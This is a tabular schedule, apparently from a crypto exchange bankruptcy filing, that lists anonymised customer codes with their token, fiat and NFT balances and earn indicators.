| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07337551 | | USD[10.00] | | |
| 07337552 | | BRZ[4], BTC[0], CUSDT[38], DOGE[1], TRX[2], USD[0.00], USDT[0] | | |
| 07337553 | | USD[10.00] | | |
| 07337554 | | USD[10.00] | | |
| 07337555 | | BAT[1], CUSDT[2], DOGE[3], GRT[0], LTC[0], TRX[1], UNI[0], USD[0.00] | | |
| 07337556 | | USD[10.00] | | |
| 07337557 | | USD[10.00] | | |
| 07337559 | | USD[10.00] | | |
| 07337560 | | BRZ[3], TRX[3018.88124818], USD[0.00] | | |
| 07337561 | | USD[10.00] | | |
| 07337562 | | CUSDT[1], DOGE[0], LTC[0], SUSHI[0], UNI[0], USD[0.01] | Yes | |
| 07337563 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07337564 | | AAVE[0], BAT[0], BTC[0], CUSDT[0], DOGE[0], ETH[0], LTC[0], MATIC[0], MKR[0], SOL[0], SUSHI[0], UNI[0], USD[0.00] | | |
| 07337565 | | CUSDT[1], USD[0.00] | | |
| 07337566 | | USD[0.00], USDT[.00009986] | | |
| 07337567 | | USD[10.00] | | |
| 07337568 | | USD[10.00] | | |
| 07337569 | | USD[10.00] | | |
| 07337570 | | USD[10.00] | | |
| 07337571 | | BRZ[0], DOGE[5939.28230844], GRT[0], TRX[1], USD[0.01] | Yes | |
| 07337572 | | DOGE[.00001028], TRX[229.98441414], USD[0.33] | Yes | |
| 07337573 | | USD[10.00] | | |
| 07337574 | | USD[10.00] | | |
| 07337575 | | USD[10.00] | | |
| 07337576 | | BRZ[1], BTC[0], CUSDT[1], TRX[2], USD[0.00] | Yes | |
| 07337578 | | USD[10.00] | | |
| 07337579 | | USD[10.00] | | |
| 07337580 | | CUSDT[2], DOGE[20.57954894], USD[1.20] | | |
| 07337581 | | CUSDT[1], USD[0.00] | Yes | |
| 07337582 | | CUSDT[3], USD[0.00] | Yes | |
| 07337583 | | BAT[48.27774642], CUSDT[1], DOGE[0], USD[0.01] | | |
| 07337584 | | BTC[.00030247], ETH[.00565098], ETHW[.00558258], NFT (57169155291245727/Entrance Voucher #25005)[1], SHIB[84823.02193076], SOL[.01192593], TRX[17.14821812], USD[4.88] | Yes | |
| 07337585 | | USD[10.00] | | |
| 07337586 | | USD[10.00] | | |
| 07337587 | | BRZ[1], CUSDT[4], DOGE[1], GRT[1.00000815], TRX[5], USD[0.00] | | |
| 07337588 | | BRZ[1], BTC[.0031626], CUSDT[1], DOGE[1079.40438091], GRT[1], TRX[32547.95209312], USD[0.00] | | |
| 07337589 | | CUSDT[33], TRX[4], USD[0.01] | Yes | |
| 07337590 | | BAT[1], CUSDT[2], DOGE[1184.11567687], USD[0.01] | | |
| 07337591 | | USD[10.00] | | |
| 07337592 | | USD[0.00] | | |
| 07337594 | | USD[10.00] | | |
| 07337595 | | ETH[.0035568], ETHW[.0035568], USD[3.08] | | |
| 07337596 | | BTC[0], CUSDT[1], SHIB[7], TRX[1], USD[0.00] | Yes | |
| 07337597 | | USD[10.00] | | |
| 07337598 | | DOGE[0], ETH[0], USD[0.00], USDT[0] | Yes | |
| 07337599 | | USD[10.00] | | |
| 07337600 | | CUSDT[3], DOGE[433.81889525], SHIB[783697.1205715], USD[4.36], USDT[.00004525] | Yes | |
| 07337601 | | BAT[0], BCH[0], BTC[0.00153633], CUSDT[7.75], DOGE[0], ETH[0.03868099], ETHW[0.03820219], GRT[0], LINK[1.13348470], LTC[0.15229298], MATIC[6.83658520], SOL[0.35518941], SUSHI[0], TRX[12.51965500], UNI[0], USD[0.00], YFI[0] | Yes | |
| 07337602 | | CUSDT[2], DOGE[0], USD[0.00] | | |
| 07337604 | | CUSDT[2], DOGE[650.41747938], USD[0.00] | | |
| 07337606 | | CUSDT[5], DOGE[.00076502], SHIB[1], TRX[1], USD[0.00] | | |
| 07337608 | | USD[10.00] | | |
| 07337609 | | USD[0.01] | | |
| 07337610 | | BAT[1], BTC[.00175495], CUSDT[2], DOGE[1], USD[0.01] | | |
| 07337611 | | USD[10.00] | | |
| 07337612 | | USD[10.00] | | |
| 07337614 | | USD[10.00] | | |
| 07337615 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07337616 | | DOGE[23.15820717], USD[0.00] | | |
| 07337617 | | USD[10.00] | | |
| 07337618 | | CUSDT[2], DOGE[277.47845414], ETH[.27766972], ETHW[.27766972], TRX[1], USD[13.43] | | |
| 07337619 | | USD[10.00] | | |
| 07337620 | | USD[10.00] | | |
| 07337621 | | USD[10.00] | | |
| 07337622 | | CUSDT[4], TRX[4], USD[0.00], USDT[0] | | |
| 07337623 | | USD[10.00] | | |
| 07337624 | | BTC[.00075398], CUSDT[1], DOGE[72.5546344], TRX[19.83270494], USD[0.00] | Yes | |
| 07337625 | | USD[10.00] | | |
| 07337627 | | USD[0.00], USDT[0] | | |
| 07337628 | | CUSDT[1], DOGE[1], TRX[1], USD[0.00] | | |
| 07337630 | | CUSDT[2], TRX[1], USD[0.00] | | |
| 07337631 | | CUSDT[1], DOGE[2701.75492649], TRX[776.10466858], USD[10.00] | | |
| 07337632 | | CUSDT[5], DOGE[590.93363946], USD[0.00] | | |
| 07337633 | | TRX[5], USD[0.00], USDT[2.03478293] | Yes | |
| 07337634 | | BTC[.00000497], DOGE[1.05728283], TRX[.1881898], USD[40.12] | Yes | |
| 07337635 | | USD[20.00] | | |
| 07337636 | | BRZ[1], CUSDT[3], DOGE[2199.39826807], TRX[9.74653777], USD[0.01] | Yes | |
| 07337637 | | BRZ[1], CUSDT[1], DOGE[2], TRX[2], USD[0.01] | | |
| 07337638 | | USD[10.00] | | |
| 07337639 | | BAT[1.0165555], BTC[.00017609], DOGE[406.7492486], ETH[.00564363], ETHW[.00557523], USD[3.08] | Yes | |
| 07337640 | | CUSDT[3], DOGE[4495.93282415], USD[11.88] | | |
| 07337641 | | USD[0.00] | Yes | |
| 07337642 | | USD[0.00], USDT[0.00000001] | | |
| 07337643 | | USD[10.00] | | |
| 07337644 | | BTC[0], ETHW[.00337948], USD[0.00] | Yes | |
| 07337645 | | USD[10.00] | | |
| 07337646 | | USD[10.00] | | |
| 07337647 | | USD[10.00] | | |
| 07337648 | | CUSDT[2], DOGE[1], USD[0.01] | Yes | |
| 07337649 | | CUSDT[1], DOGE[3070.9201918], SHIB[1], TRX[1], USD[0.00], USDT[1] | | |
| 07337650 | | USD[10.00] | | |
| 07337651 | | TRX[1], USD[0.00] | | |
| 07337652 | | CUSDT[1], USD[0.00] | | |
| 07337653 | | USD[10.00] | | |
| 07337654 | | NFT (575492758859308758/Entrance Voucher #2483)[1], USD[0.00] | | |
| 07337655 | | USD[10.00] | | |
| 07337656 | | BRZ[1], USD[0.00] | | |
| 07337657 | | BRZ[1], BTC[.00000007], CUSDT[1], DOGE[3.03523648], GRT[.00164123], TRX[4], UNI[.00017588], USD[0.60] | | |
| 07337658 | | USD[10.00] | | |
| 07337659 | | TRX[77.99609317], USD[0.00] | | |
| 07337660 | | USD[0.00] | | |
| 07337661 | | BAT[1], BRZ[2], CUSDT[1], TRX[4], USD[81.92] | | |
| 07337662 | | DOGE[2805.63206441], TRX[1], USD[0.01] | Yes | |
| 07337663 | | USD[10.00] | | |
| 07337664 | | BAT[1], BRZ[1], CUSDT[6], DOGE[.00002322], TRX[.00006572], USD[0.00], USDT[1] | | |
| 07337665 | | BRZ[1], CUSDT[2], TRX[2], USD[0.00], USDT[1] | | |
| 07337666 | | USD[10.00] | | |
| 07337667 | | DOGE[330.18375267], TRX[309.27924328], USD[10.00] | | |
| 07337668 | | USD[10.00] | | |
| 07337669 | | CUSDT[2], DOGE[1], USD[0.29] | | |
| 07337670 | | BRZ[3], CUSDT[2], DOGE[3], GRT[1], SHIB[3], TRX[88.24537532], UNI[.00012003], USD[17.39], USDT[0.73775946] | Yes | |
| 07337672 | | DOGE[248.29003448], USD[0.00] | Yes | |
| 07337674 | | CUSDT[1], DOGE[.0332856], TRX[1432.88050965], USD[0.00] | | |
| 07337675 | | BTC[0], DOGE[0], ETH[0], LINK[0], TRX[1], UNI[0], USD[0.00], USDT[0] | | |
| 07337676 | | BTC[0], DOGE[3], ETH[0], GRT[0], USD[0.00], USDT[0] | | |
| 07337677 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07337678 | | DOGE[.00003405], TRX[1], USD[0.00] | | |
| 07337679 | | USD[0.02] | | |
| 07337680 | | NFT (385581884595191229G/Imola Ticket Stub #2313)[1] | | |
| 07337681 | | USD[10.00] | | |
| 07337682 | | USD[10.00] | | |
| 07337683 | | USD[10.00] | | |
| 07337684 | | USD[0.00] | Yes | |
| 07337685 | | USD[10.00] | | |
| 07337686 | | DOGE[1], USD[0.00] | | |
| 07337687 | | USD[10.00] | | |
| 07337688 | | BRZ[2], CUSDT[3], DOGE[0], USD[0.01] | | |
| 07337689 | | AAVE[0], AUD[0.00], BAT[.00000001], BCH[0], BRZ[0], BTC[0.01554176], CAD[0.00], CUSDT[0], DAI[.00000001], DOGE[0], ETH[0.00000176], ETHW[0], EUR[0.00], GBP[0.00], LINK[0], LTC[0], MATIC[.00000001], MKR[0], PAXG[0], SGD[0.00], SHIB[2], SOL[0], TRX[0], UNI[0], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07337690 | | DOGE[174.47628326], USD[0.00] | | |
| 07337691 | | TRX[1], USD[10.91] | Yes | |
| 07337693 | | BRZ[1], BTC[.00031747], CUSDT[4], DOGE[5.07385846], USD[0.00] | Yes | |
| 07337694 | | USD[10.00] | | |
| 07337695 | | USD[10.00] | | |
| 07337696 | | BRZ[1], SHIB[2], TRX[2], USD[0.01], USDT[0] | Yes | |
| 07337697 | | DOGE[.00000045], SOL[.95242299], USD[0.00] | | |
| 07337699 | | DOGE[148.41084633], USD[0.00] | | |
| 07337700 | | BRZ[0], DOGE[0], SOL[0], USD[0.00], USDT[0] | | |
| 07337701 | | DOGE[1], ETH[0], USD[0.00] | Yes | |
| 07337702 | | DOGE[1.00007246], USD[0.00] | | |
| 07337703 | | USD[10.00] | | |
| 07337704 | | USD[10.00] | | |
| 07337705 | | USD[10.00] | | |
| 07337706 | | CUSDT[33.77580134], DOGE[1.01496146], TRX[2], USD[0.14] | | |
| 07337707 | | BRZ[1], USD[0.01] | | |
| 07337710 | | USD[10.00] | | |
| 07337711 | | USD[60.00] | | |
| 07337712 | | BTC[0], CUSDT[7], DOGE[0], ETH[.00171505], ETHW[0.00171505], GRT[1], TRX[.00002738], USD[0.01] | | |
| 07337713 | | USD[10.00] | | |
| 07337714 | | BTC[0], CUSDT[5], DOGE[3.98047134], ETH[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07337715 | | USD[10.00] | | |
| 07337716 | | USD[10.98] | Yes | |
| 07337717 | | DOGE[37.17044617], GRT[0], USD[0.00] | | |
| 07337718 | | GRT[5.49358435], USD[0.00] | | |
| 07337719 | | USD[10.00] | | |
| 07337720 | | BAT[1], BRZ[2], CUSDT[1], TRX[3], USD[0.01] | | |
| 07337721 | | USD[10.00] | | |
| 07337722 | | USD[10.00] | | |
| 07337723 | | DOGE[140.54632041], USD[0.00] | | |
| 07337724 | | USD[10.00] | | |
| 07337725 | | USD[10.00] | | |
| 07337726 | | CUSDT[2], DOGE[.10018162], TRX[4], USD[0.00] | Yes | |
| 07337727 | | USD[10.00] | | |
| 07337728 | | USD[10.00] | | |
| 07337729 | | BAT[82.11562593], BCH[.06923267], BRZ[10], CUSDT[40], ETH[.72318604], ETHW[1.42318604], GRT[2], LINK[5.30659137], LTC[1.96005038], SHIB[3], SOL[3.41424169], TRX[8], UNI[4.23404291], USD[115.17], USDT[1], YFI[.00355647] | | |
| 07337731 | | USD[10.00] | | |
| 07337732 | | USD[10.00] | | |
| 07337734 | | CUSDT[3], DOGE[1], GRT[5169.8520418], TRX[4], USD[0.00], USDT[1] | | |
| 07337735 | | DOGE[727.50552904], TRX[1], USD[0.00] | | |
| 07337736 | | BRZ[2], DOGE[969.37382034], GRT[1], SHIB[1], TRX[1], USD[0.55] | Yes | |
| 07337737 | | USD[10.00] | | |
| 07337738 | | BRZ[1], CUSDT[1], DOGE[2], TRX[1], USD[0.01] | | |
| 07337739 | | USD[10.00] | | |
| 07337740 | | BTC[.00017687], USD[0.00] | | |
| 07337741 | | DOGE[3], GBP[0.00], USD[0.01] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07337742 | | USD[0.00] | | |
| 07337743 | | AAVE[.03967743], AVAX[.12138575], BCH[.02003762], BRZ[1], BTC[.00157213], CUSDT[545.83699774], DAI[1.27301154], DOGE[1], ETH[.01862494], ETHW[.01839238], GRT[.98355459], KSHIB[357.61982393], LINK[.6471211], LTC[.08264764], MATIC[8.87108045], MKR[.00447517], NFT (295682963739620276/Cutie Kittens #5)[1], NFT (296612238476082095/PIG 07)[1], NFT (305541903989954586/Cryptographic zombie #60)[1], NFT (316860806856677387/Ripple Cat)[1], NFT (319992876048852995/Night Crossroads)[1], NFT (348477371616895619/Toy Soldier #002)[1], NFT (439527882797763587/4x4 Jamboree)[1], NFT (463747743591766049/Crypto)[1], NFT (480565922829154130/Holy Unicorn Edition #16)[1], NFT (492256943129412067/Heavenly water#075)[1], NFT (494301604617816784/Cactus Series #3)[1], NFT (498448034953241842/Kiddo #4851)[1], NFT (509126338084452383/Colorflow #1)[1], NFT (510854465117286674/Little Red Express Truck Sketch)[1], NFT (522418453792510677/pixel man #5)[1], NFT (567150503205824205/lazyPanda #26)[1], SHIB[2], SOL[.36298034], SUSHI[.560129], TRX[1], UNI[.95120712], USD[2.11], USDT[0.00000001], YFI[.00011073] | Yes | |
| 07337744 | | ETH[.00568693], ETHW[.00568693], USD[0.00] | | |
| 07337745 | | DOGE[0], TRX[2], USD[0.00], USDT[0] | | |
| 07337746 | | BAT[1], CUSDT[2], DOGE[.05295615], ETH[1.78720866], ETHW[1.78645797], USD[0.00] | Yes | |
| 07337747 | | CUSDT[12.48806706], DOGE[8428.66254262], GRT[2.08221052], TRX[4], USD[0.01], USDT[1.10845543] | Yes | |
| 07337748 | | CUSDT[2], GRT[0], USD[0.00] | Yes | |
| 07337749 | | BRZ[1], CUSDT[1], USD[10.03] | Yes | |
| 07337750 | | USD[10.00] | | |
| 07337751 | | BRZ[1], CUSDT[1], DOGE[2.00000631], GRT[1], TRX[2], USD[0.01] | | |
| 07337752 | | USD[10.00] | | |
| 07337753 | | BRZ[2], CUSDT[10], TRX[2], USD[0.00] | | |
| 07337755 | | USD[10.00] | | |
| 07337756 | | BTC[0], USD[0.00], USDT[0.00000001] | | |
| 07337757 | | USD[10.00] | | |
| 07337758 | | BTC[.0000508], DOGE[2.35528617], TRX[1], USD[0.56] | | |
| 07337760 | | USD[10.00] | | |
| 07337761 | | USD[20.00] | | |
| 07337762 | | USD[10.00] | | |
| 07337763 | | USD[10.00] | | |
| 07337764 | | USD[10.00] | | |
| 07337765 | | BAT[111.2167054], BRZ[3], CUSDT[23], DOGE[195.65981251], KSHIB[369.09842178], SHIB[1341083.23693534], SOL[4.1954619], TRX[177.536688], USD[0.00] | | |
| 07337766 | | USD[10.00] | | |
| 07337767 | | USD[10.00] | | |
| 07337768 | | USD[10.00] | | |
| 07337769 | | LTC[.04284974], USD[0.01] | | |
| 07337770 | | USD[10.00] | | |
| 07337771 | | GRT[0], PAXG[0], SOL[0.00025813], TRX[0], USD[0.01] | Yes | |
| 07337772 | | BTC[.00040715], DOGE[1], USD[30.00] | | |
| 07337773 | | USD[0.00] | | |
| 07337774 | | USD[10.00] | | |
| 07337775 | | CUSDT[2], DOGE[10090.38065159], TRX[1], USD[0.00] | | |
| 07337777 | | BTC[.00021005], USD[0.00] | | |
| 07337778 | | USD[10.00] | | |
| 07337779 | | USD[10.00] | | |
| 07337780 | | DOGE[.0120971], TRX[1], USD[0.04] | | |
| 07337781 | | BAT[1], CUSDT[2], DOGE[30.61785983], USD[0.00] | | |
| 07337782 | | USD[10.00] | | |
| 07337783 | | USD[0.03] | | |
| 07337784 | | DOGE[1], GRT[1], SHIB[1], USD[124.80] | | |
| 07337785 | | USD[0.00] | Yes | |
| 07337786 | | USD[10.00] | | |
| 07337787 | | BAT[1], BRZ[2], CUSDT[962.89756788], DOGE[0], ETH[0], GRT[1.03732988], SOL[.00000001], TRX[3], USD[0.00], USDT[1] | | |
| 07337788 | | USD[10.00] | | |
| 07337789 | | CUSDT[5], DOGE[1], GRT[2], TRX[6], USD[0.00] | | |
| 07337790 | | BAT[1], BTC[0.00000002], CUSDT[3], DOGE[2], ETH[0], LTC[0], TRX[2], USD[0.00] | | |
| 07337791 | | USD[10.00] | | |
| 07337792 | | TRX[61.034929], USD[0.00] | | |
| 07337793 | | BRZ[1], GRT[17.18100567], SOL[6.02196914], SUSHI[.99999306], UNI[0], USD[0.00] | | |
| 07337794 | | CUSDT[1], SHIB[3], USD[0.00] | | |
| 07337795 | | USD[10.00] | | |
| 07337796 | | BRZ[1], DOGE[2], ETH[1.42504894], ETHW[1.42445048], TRX[1], USD[11.00] | Yes | |
| 07337797 | | CUSDT[1], DOGE[1], TRX[1], USD[0.01] | | |
| 07337798 | | USD[10.04] | | |
| 07337799 | | BRZ[2], DOGE[1.19082402], KSHIB[1.72387437], SHIB[316065.07378021], TRX[1], USD[8.88], YFI[.00073709] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07337800 | | DOGE[136.4466083], USD[0.00] | | |
| 07337801 | | CUSDT[1], DOGE[1], GRT[4.2902159], SOL[1.37653462], SUSHI[1.10790904], USD[0.00] | Yes | |
| 07337802 | | USD[11.05] | Yes | |
| 07337803 | | USD[10.00] | | |
| 07337804 | | DOGE[1.00002537], USD[0.01] | | |
| 07337805 | | BAT[.88555078], BCH[.00189208], ETH[.00049002], ETHW[.00049002], GRT[.57843606], LINK[.03366971], LTC[.00505155], SOL[.0470381], SUSHI[.06623453], TRX[9.71606238], USD[0.00], YFI[.00002729] | Yes | |
| 07337806 | | USD[10.00] | | |
| 07337807 | | USD[10.00] | | |
| 07337808 | | BRZ[2], CUSDT[27], DOGE[599.96738899], KSHIB[930.92048672], NFT (52040654506194435/Bahrain Ticket Stub #2278)[1], SHIB[25551887.99907188], TRX[4], USD[1.00] | | |
| 07337809 | | USD[10.00] | | |
| 07337810 | | NFT (292322499014711482/Mob cats collection #90)[1], NFT (431539351023249440/Mob cats collection #14)[1], SHIB[0], USD[0.00] | Yes | |
| 07337811 | | TRX[1], USD[27.15] | | |
| 07337812 | | DOGE[3], USD[0.00] | | |
| 07337813 | | CUSDT[1], USD[0.00] | Yes | |
| 07337814 | | USD[0.00] | | |
| 07337815 | | USD[10.00] | | |
| 07337816 | | USD[10.00] | | |
| 07337818 | | USD[0.00] | | |
| 07337819 | | USD[10.00] | | |
| 07337820 | | BAT[6.80317998], DOGE[12], TRX[1], USD[0.00] | | |
| 07337821 | | CUSDT[1], USD[0.00] | | |
| 07337823 | | AVAX[0], BCH[0], BRZ[0], BTC[0], DOGE[0], ETH[0], ETHW[0], GRT[0], SHIB[5.00000001], SOL[0], TRX[0], USD[0.00], USDT[0.00000006] | Yes | |
| 07337824 | | USD[0.01] | | |
| 07337825 | | CUSDT[2], DOGE[7369.06736296], USD[0.00] | Yes | |
| 07337826 | | BAT[1.01655549], CUSDT[4], DOGE[.88500978], GRT[.00008811], TRX[2], USD[0.14] | Yes | |
| 07337827 | | USD[10.00] | | |
| 07337828 | | SHIB[1], SOL[2.57670783], USD[0.00] | | |
| 07337829 | | USD[10.00] | | |
| 07337830 | | USD[10.00] | | |
| 07337831 | | USD[0.00] | | |
| 07337832 | | GRT[4.52191201], USD[0.00] | | |
| 07337833 | | USD[10.00] | | |
| 07337834 | | USD[2.13], USDT[0] | | |
| 07337835 | | USD[10.00] | | |
| 07337837 | | CUSDT[1], DOGE[1202.43465259], SHIB[1413627.36782584], SOL[44.27125366], TRX[3128.18194757], USD[0.00] | | |
| 07337838 | | BRZ[1], DOGE[1], TRX[1], USD[0.00] | | |
| 07337839 | | USD[10.00] | | |
| 07337840 | | BTC[.00141634], DOGE[1], TRX[1], USD[0.00] | | |
| 07337841 | | USD[10.00] | | |
| 07337842 | | USD[0.01], USDT[0] | | |
| 07337843 | | BTC[.00021095], USD[0.00] | | |
| 07337844 | | BRZ[1], CUSDT[3], DOGE[51.45058379], GRT[.00004056], SHIB[332005.31208499], TRX[4], USD[0.00] | | |
| 07337845 | | USD[10.00] | | |
| 07337846 | | BTC[.00466425], DOGE[2], USD[10.00] | | |
| 07337847 | | BCH[.37504577], BRZ[126.04448964], CUSDT[2558.8030921], DOGE[2619.92159157], ETH[.15331497], ETHW[.1525546], LTC[1.49358534], NFT (308130971849810414/Ford )[1], NFT (313991683132871368/You made it)[1], NFT (325081356280308079/Strong )[1], NFT (327732203699132632/To the moon...)[1], NFT (344977078144520267/Ducati #2)[1], NFT (362113460862573832/USA )[1], NFT (448271365178242994/Sweat it out )[1], NFT (483311649475122633/Feed me )[1], NFT (551775623752382959/Fireball coconut shot)[1], NFT (575847413570423389/Brick World #34)[1], PAXG[.00755212], SUSHI[8.671774455], TRX[5797.44280996], USD[0.01], YFI[.00342855] | Yes | |
| 07337848 | | CUSDT[1], DOGE[1.00647414], USD[0.00] | | |
| 07337849 | | BRZ[6], BTC[0], CUSDT[9], DOGE[0], ETH[0], ETHW[0], TRX[12], USD[0.00], USDT[2] | | |
| 07337850 | | USD[10.00] | | |
| 07337851 | | USD[10.00] | | |
| 07337852 | | USD[10.00] | | |
| 07337854 | | CUSDT[2], LTC[.04554496], TRX[1], USD[0.00] | | |
| 07337855 | | USD[10.00] | | |
| 07337856 | | USD[10.00] | | |
| 07337857 | | USD[10.00] | | |
| 07337858 | | USD[10.00] | | |
| 07337859 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07337860 | | BTC[.00000536], DOGE[1], USD[0.00] | | |
| 07337861 | | USD[10.00] | | |
| 07337862 | | CUSDT[2], DOGE[.00465584], USD[0.00] | | |
| 07337863 | | USD[10.00] | | |
| 07337864 | | DOGE[97.45985802], LINK[.84205], USD[0.06] | Yes | |
| 07337865 | | GRT[1], USD[10.92], USDT[0] | Yes | |
| 07337866 | | USD[0.00] | | |
| 07337868 | | USD[10.00] | | |
| 07337869 | | USD[10.00] | | |
| 07337870 | | NFT (531693497227862892/Entrance Voucher #2079)[1], USD[0.00] | | |
| 07337871 | | USD[10.00] | | |
| 07337872 | | DOGE[0], USD[10.00] | | |
| 07337873 | | CUSDT[1], DOGE[1], USD[0.00], USDT[1], YFI[0] | | |
| 07337874 | | CUSDT[5], NFT (494484745159641940/Aligned with the Sky)[1], SOL[0.00079905], USD[0.00] | Yes | |
| 07337875 | | USD[14.00] | | |
| 07337876 | | DOGE[58.33575399], USD[0.00] | Yes | |
| 07337877 | | USD[10.00] | | |
| 07337879 | | BTC[.00022279], CUSDT[1], DOGE[1], TRX[1], USD[0.01] | | |
| 07337880 | | USD[10.00] | | |
| 07337881 | | BRZ[2], BTC[0], CUSDT[5], DOGE[0.77769832], TRX[4], USD[0.00] | | |
| 07337882 | | USD[10.00] | | |
| 07337883 | | USD[10.00] | | |
| 07337884 | | USD[10.00] | | |
| 07337885 | | CUSDT[.9794], DOGE[.00009058], USD[0.01] | | |
| 07337886 | | BRZ[1], DOGE[1], SHIB[344471.23665173], USD[0.01], USDT[0.00000001] | | |
| 07337887 | | USD[10.00] | | |
| 07337888 | | USD[0.00], USDT[0.00000001] | | |
| 07337889 | | USD[10.00] | | |
| 07337891 | | BAT[1.0165555], BRZ[0], CUSDT[2], DOGE[12776.59847291], GRT[2.00608849], SHIB[2], SOL[0], USD[0.00], USDT[0] | Yes | |
| 07337892 | | USD[10.00] | | |
| 07337893 | | USD[10.00] | | |
| 07337894 | | CUSDT[1], DOGE[5988.13421872], ETH[.00000045], ETHW[.00000045], USD[0.00], USDT[0.00000001] | Yes | |
| 07337895 | | USD[10.00] | | |
| 07337896 | | DOGE[1], USD[0.01] | | |
| 07337897 | | LTC[.04996294], TRX[1], USD[0.00] | Yes | |
| 07337898 | | BRZ[1], USD[0.00] | | |
| 07337899 | | USD[10.00] | | |
| 07337901 | | DOGE[1.00009515], USD[0.00] | | |
| 07337903 | | ETH[0], SUSHI[0], USD[0.00] | | |
| 07337904 | | USD[0.01] | | |
| 07337905 | | BRZ[1], CUSDT[2], EUR[13.97], USD[0.00] | | |
| 07337906 | | USD[10.00] | | |
| 07337907 | | BAT[362.55251653], BRZ[1], CUSDT[3], GRT[1058.96569284], SOL[23.5809186], SUSHI[17.95763547], TRX[2], USD[0.00] | Yes | |
| 07337908 | | USD[10.00] | | |
| 07337909 | | BAT[1], BRZ[1], CUSDT[2], DOGE[1], TRX[4], USD[0.00] | | |
| 07337910 | | CUSDT[2], TRX[2], USD[0.00] | | |
| 07337911 | | DOGE[436.55553039], USD[10.00] | | |
| 07337912 | | CUSDT[3], DOGE[88.93577657], SHIB[20041.08016032], SUSHI[2.27335294], TRX[1], UNI[1.10796965], USD[0.00] | Yes | |
| 07337913 | | BRZ[1], CUSDT[2], DOGE[70.49013909], SUSHI[3.2361132], TRX[1], USD[0.00] | Yes | |
| 07337916 | | USD[10.00] | | |
| 07337917 | | USD[10.00] | | |
| 07337918 | | GRT[4.79619079], NFT (299178269106882127/10)[1], USD[13.06] | Yes | |
| 07337919 | | USD[10.00] | | |
| 07337920 | | USD[10.00] | | |
| 07337922 | | LTC[0], MATIC[.00000001], SHIB[5], SOL[0], USD[0.01], USDT[0] | Yes | |
| 07337923 | | BRZ[1], SOL[0], TRX[1], USD[0.00] | | |
| 07337924 | | DOGE[74.91822828], USD[0.50] | Yes | |
| 07337925 | | USD[0.01] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07337926 | | DOGE[241.97840224], USD[98.00] | | |
| 07337928 | | USD[0.00] | | |
| 07337929 | | BTC[0], CUSDT[3], DOGE[0], LINK[0], MATIC[8.19207708], USD[0.00] | | |
| 07337930 | Contingent, Disputed | USD[10.00] | | |
| 07337931 | | CUSDT[1], USD[0.00] | Yes | |
| 07337932 | | USD[10.00] | | |
| 07337933 | | BRZ[3], CUSDT[8.30450925], GRT[1.00498957], TRX[2], USD[0.01], USDT[0] | Yes | |
| 07337934 | | CUSDT[1], DOGE[0], ETH[0], USD[0.00], USDT[1.08651657] | Yes | |
| 07337935 | | USD[0.00] | | |
| 07337936 | | USD[10.00] | | |
| 07337937 | | CUSDT[3], TRX[2], USD[0.01] | | |
| 07337938 | | USD[10.00] | | |
| 07337939 | | CUSDT[3], GRT[1.00498957], TRX[1], USD[0.00] | Yes | |
| 07337940 | | USD[10.00] | | |
| 07337941 | | BRZ[1], CUSDT[1], DOGE[1], TRX[401.11346585], UNI[1.42798224], USD[0.00] | Yes | |
| 07337942 | | USD[10.00] | | |
| 07337943 | | DOGE[.00075847], USD[0.00], USDT[0] | | |
| 07337944 | | USD[10.00] | | |
| 07337945 | | USD[10.00] | | |
| 07337946 | | USD[10.00] | | |
| 07337947 | | CUSDT[2], DOGE[2], TRX[2], USD[0.01] | | |
| 07337948 | | CUSDT[1], GRT[413.27097887], TRX[1], USD[0.00] | | |
| 07337949 | | USD[10.00] | | |
| 07337950 | | USD[10.00] | | |
| 07337951 | | USD[10.00] | | |
| 07337952 | | USD[10.00] | | |
| 07337953 | | USD[10.00] | | |
| 07337954 | | USD[10.00] | | |
| 07337955 | | CUSDT[1], DOGE[8794.94801547], USD[10.00] | | |
| 07337956 | | DAI[0], DOGE[0], GRT[0], USD[0.00] | | |
| 07337957 | | USD[10.00] | | |
| 07337958 | | BRZ[3], CUSDT[8.00000235], DOGE[2], SHIB[1], TRX[2], USD[2.09], USDT[0] | Yes | |
| 07337959 | | BTC[0], DOGE[1], ETH[0], ETHW[0.07781646], SHIB[1218032.79658952], USD[0.00] | | |
| 07337960 | | CUSDT[8], DOGE[1], TRX[1], USD[0.01] | | |
| 07337961 | | USD[10.00] | | |
| 07337962 | | CUSDT[1], UNI[.45888087], USD[10.00] | | |
| 07337963 | | USD[10.00] | | |
| 07337964 | | USD[10.00] | | |
| 07337965 | | USD[10.60] | Yes | |
| 07337966 | | USD[10.00] | | |
| 07337967 | | USD[10.00] | | |
| 07337968 | | USD[10.62] | Yes | |
| 07337969 | | DOGE[14.29954793], SHIB[700982.38052984], USD[0.00] | Yes | |
| 07337971 | | CUSDT[3], TRX[2], USD[0.01] | Yes | |
| 07337972 | | USD[0.05] | | |
| 07337973 | | BRZ[1], CUSDT[1], USD[0.00] | | |
| 07337974 | | ETH[0], USD[0.01] | | |
| 07337975 | | USD[10.00] | | |
| 07337976 | | LINK[.32461139], USD[0.00] | | |
| 07337977 | | USD[10.00] | | |
| 07337978 | | USD[10.00] | | |
